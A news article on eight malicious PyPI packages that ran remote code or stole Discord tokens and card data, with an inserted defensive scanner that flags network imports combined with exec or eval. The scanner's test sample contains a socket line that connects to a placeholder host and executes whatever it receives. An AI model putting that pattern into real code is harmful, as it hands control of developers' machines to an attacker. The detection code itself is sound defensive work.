- Jul 27, 2015
The operators of the Python Package Index (PyPI), the official repository for Python components, have removed eight libraries this week that contained malicious code.
Discovered by the JFrog security team, formerly known as VDOO, the eight packages can be grouped into two categories based on the malicious operations they performed. Two of the eight allowed a remote attacker to run malicious commands on a victim’s device by making the infected host connect to an attacker’s IP address on TCP port 9009, and then execute any malicious Python code provided by this server. The other six PyPI packages worked primarily as stealers. Once installed on a developer’s computer, they collected data from the infected host with a focus on general system information, Discord tokens (scraped from predetermined disk locations), and payment card information (extracted from locally installed browsers such as Google, Opera, Brave, and Yandex).
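The first category above is the pattern a package reviewer can look for before a dependency is installed: code that both reaches out to the network and hands whatever it receives to `exec`. The following AST-based triage heuristic is an added example, not JFrog's tooling or code from the removed packages; the module lists, the `Findings` class and the two sample sources are constructed for illustration.

```python
import ast
from dataclasses import dataclass, field

# Hypothetical triage heuristic (added example, not JFrog's tooling): a module
# that both imports networking code and feeds data to exec/eval matches the
# "connect to a remote host, run whatever it sends" behaviour described above.
NETWORK_ROOTS = {"socket", "urllib", "requests", "http"}
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}


@dataclass
class Findings:
    network_imports: set = field(default_factory=set)
    dynamic_exec_calls: list = field(default_factory=list)  # (name, lineno)

    @property
    def suspicious(self) -> bool:
        return bool(self.network_imports) and bool(self.dynamic_exec_calls)


def scan_source(source: str) -> Findings:
    """Walk one module's AST (setup.py or any file in the sdist) and collect both indicators."""
    f = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module]
        else:
            names = []
        f.network_imports.update(n for n in names if n.split(".")[0] in NETWORK_ROOTS)
        # Only direct calls are matched; an aliased builtin (getattr(builtins, ...))
        # slips past, which is why this is a triage signal, not a verdict.
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in DYNAMIC_EXEC):
            f.dynamic_exec_calls.append((node.func.id, node.lineno))
    return f


# Constructed samples (source strings only; nothing in them is executed).
SUSPICIOUS_SAMPLE = '''
import socket
s = socket.socket()
s.connect((REMOTE_HOST, 9009))  # REMOTE_HOST is a placeholder, left undefined on purpose
exec(s.recv(4096))
'''
BENIGN_SAMPLE = '''
import json
def load(path):
    with open(path) as fh:
        return json.load(fh)
'''
```

Running `scan_source` over every `.py` file in an unpacked sdist, `setup.py` included, gives a short list of modules worth a manual read before `pip install` ever runs them.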
Based on statistics gathered through the third-party service Pepy, the JFrog team said the eight libraries were downloaded more than 30,000 times before being removed from the PyPI portal. An in-depth technical report on each library's capabilities is available on the JFrog blog.
This week's incident is not out of the ordinary. Malicious packages make it onto the official PyPI repository on a regular basis, as they do onto the official repositories of many other programming languages. For example, security researchers have previously discovered malicious PyPI packages that contained a hidden backdoor targeting Linux systems, PyPI packages that opened reverse shells on infected hosts, and PyPI packages that stole SSH and GPG keys. Discord tokens have also been at the center of incidents on the npm (JavaScript) repository on at least two occasions.
Python packages caught attempting to steal Discord tokens, credit card numbers
therecord.media